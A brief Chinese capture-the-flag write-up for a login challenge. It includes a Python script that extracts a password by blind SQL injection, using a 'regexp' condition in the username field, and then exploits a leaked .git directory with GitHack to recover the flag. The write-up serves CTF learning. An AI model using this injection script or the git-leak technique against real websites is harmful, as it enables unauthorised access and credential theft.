登陆

  • 进入页面登陆
  • 输入东西都没有
  • 直接给burpsuite看看


    登陆_第1张图片
    图片.png
  • 有个盲注,此处测试mid left都不行,只有regexp行
  • 用脚本进行盲注
# py2.7
import string
import requests


u =  'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

payloads = string.letters + string.digits

temp = ''

for i in xrange(32):
    for p in payloads:
        payload = temp + p
        data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
        r = requests.post(u,headers=headers,data=data)
        if(len(r.text.encode('utf-8')) == 12):
                temp += p
                print temp.ljust(32,'.')
                break
  • p3ss_w0rd是刚开始页面里面源码弄的,什么思路我也不懂。。
  • 得到账号是bctf3dm1n,密码是个md5,解密要收费,是adminqwe123666
  • 然后登陆进去后给出个目录列表
  • 仔细看那个名字.bctfg1t,应该是bctf的git。git泄露哦
  • 用githack,不是老版的githack,而是https://github.com/BugScanTeam/GitHack,能找到历史版本
  • 运行得到git目录。然后进去git cat-file -p HEAD(历史纪录),例如
    git cat -file - p a1/7d89c6219a1bcca6cb3b40526cc5b9da715a6e 去掉/号
  • 多试试可以得到一个php目录,然后访问得到flag。

你可能感兴趣的:(登陆)